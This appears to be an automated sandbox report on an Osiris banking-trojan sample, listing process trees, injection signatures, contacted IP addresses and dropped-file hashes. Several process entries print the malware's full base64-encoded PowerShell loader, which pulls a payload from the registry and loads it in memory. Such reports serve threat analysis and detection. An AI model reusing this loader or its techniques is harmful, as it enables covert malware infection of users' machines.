Malware Analysis Report

2025-01-22 13:30

Sample ID 210404-pe8qwwv14x
Target 6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.zip
SHA256 93f2dc37243ae1365ee519eaa6042aa5762e5e18fef8cb7e4bc7b657525c6895
Tags
osiris banker botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

93f2dc37243ae1365ee519eaa6042aa5762e5e18fef8cb7e4bc7b657525c6895

Threat Level: Known bad

The file 6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.zip was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet

Osiris

Executes dropped EXE

Looks up external IP address via web service

Uses Tor communications

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Gathers network information

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-04-04 19:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-04-04 19:45

Reported

2021-04-04 19:48

Platform

win7v20201028

Max time kernel

142s

Max time network

59s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

Signatures

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\tasklist.exe

tasklist

Network

N/A

Files

memory/1700-2-0x0000000000000000-mapping.dmp

memory/1924-3-0x0000000002DA0000-0x0000000002DA4000-memory.dmp

memory/1648-4-0x0000000000000000-mapping.dmp

memory/1648-5-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

memory/1648-6-0x00000000742C0000-0x00000000749AE000-memory.dmp

memory/1648-7-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

memory/1648-8-0x0000000000F30000-0x0000000000F31000-memory.dmp

memory/1648-9-0x00000000047F0000-0x00000000047F1000-memory.dmp

memory/1648-10-0x0000000001140000-0x0000000001141000-memory.dmp

memory/1648-11-0x0000000000F32000-0x0000000000F33000-memory.dmp

memory/1648-12-0x0000000005240000-0x0000000005241000-memory.dmp

memory/1648-15-0x00000000056B0000-0x00000000056B1000-memory.dmp

memory/1648-20-0x00000000056F0000-0x00000000056F1000-memory.dmp

memory/1648-21-0x0000000005750000-0x0000000005751000-memory.dmp

memory/1648-28-0x0000000006210000-0x0000000006211000-memory.dmp

memory/1648-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/1828-30-0x0000000000000000-mapping.dmp

memory/1220-31-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-04-04 19:45

Reported

2021-04-04 19:48

Platform

win10v20201028

Max time kernel

150s

Max time network

110s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

Signatures

Osiris

banker botnet osiris

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Uses Tor communications

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1160 set thread context of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3116 wrote to memory of 2296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 3116 wrote to memory of 2296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 1160 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 1160 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 1160 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 1160 wrote to memory of 2300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2300 wrote to memory of 1624 N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
PID 2300 wrote to memory of 1624 N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

Network

Country Destination Domain Proto
N/A 131.188.40.189:80 131.188.40.189 tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 107.22.233.72:443 api.ipify.org tcp
N/A 198.245.50.175:80 198.245.50.175 tcp
N/A 185.22.173.180:443 tcp
N/A 8.8.8.8:53 time-a.nist.gov udp
N/A 129.6.15.28:13 time-a.nist.gov tcp
N/A 176.53.90.26:80 176.53.90.26 tcp
N/A 51.89.6.40:80 51.89.6.40 tcp
N/A 46.59.65.88:80 46.59.65.88 tcp
N/A 185.165.168.168:80 185.165.168.168 tcp
N/A 185.220.103.10:80 185.220.103.10 tcp
N/A 193.108.117.41:443 tcp
N/A 66.175.208.248:80 66.175.208.248 tcp
N/A 109.68.191.132:80 109.68.191.132 tcp
N/A 127.0.0.1:32767 tcp

Files

memory/2296-3-0x0000000000000000-mapping.dmp

memory/1160-4-0x0000000000000000-mapping.dmp

memory/1160-5-0x00000000738C0000-0x0000000073FAE000-memory.dmp

memory/1160-6-0x0000000006D70000-0x0000000006D71000-memory.dmp

memory/1160-7-0x0000000007540000-0x0000000007541000-memory.dmp

memory/1160-8-0x0000000006F00000-0x0000000006F01000-memory.dmp

memory/1160-9-0x0000000006F02000-0x0000000006F03000-memory.dmp

memory/1160-10-0x0000000007360000-0x0000000007361000-memory.dmp

memory/1160-11-0x0000000007480000-0x0000000007481000-memory.dmp

memory/1160-12-0x0000000007BE0000-0x0000000007BE1000-memory.dmp

memory/1160-13-0x0000000007E30000-0x0000000007E31000-memory.dmp

memory/1160-14-0x0000000007CA0000-0x0000000007CA1000-memory.dmp

memory/1160-15-0x0000000008780000-0x0000000008781000-memory.dmp

memory/1160-16-0x0000000008510000-0x0000000008511000-memory.dmp

memory/1160-17-0x0000000009560000-0x0000000009561000-memory.dmp

memory/1160-18-0x0000000009270000-0x0000000009271000-memory.dmp

memory/1160-19-0x00000000094F0000-0x00000000094F1000-memory.dmp

memory/1160-20-0x0000000009B00000-0x0000000009B01000-memory.dmp

memory/1160-21-0x0000000009610000-0x0000000009612000-memory.dmp

memory/1160-22-0x0000000009790000-0x00000000098DC000-memory.dmp

memory/2300-23-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2300-24-0x0000000000401698-mapping.dmp

memory/2300-26-0x00000000029A0000-0x0000000002A3F000-memory.dmp

memory/2300-25-0x0000000000400000-0x0000000000456000-memory.dmp

memory/1624-27-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

memory/1160-30-0x0000000006F03000-0x0000000006F04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 14e6bdaafdf0275caf6062ba1d9859ae
SHA1 8da08ab17eb0afdf491550d1651c9c79781b41c1
SHA256 71ee32fd26b21ab352c73cc96781d6074570cc406d5b05ae3a35957f22714a43
SHA512 439ade02e82d66bc075746c384b3a19b90320c0279b15b2f83703a6496cb337c159f209d791b1fe412600418ea027386e22fe61102aa1b4e60d691a58a032484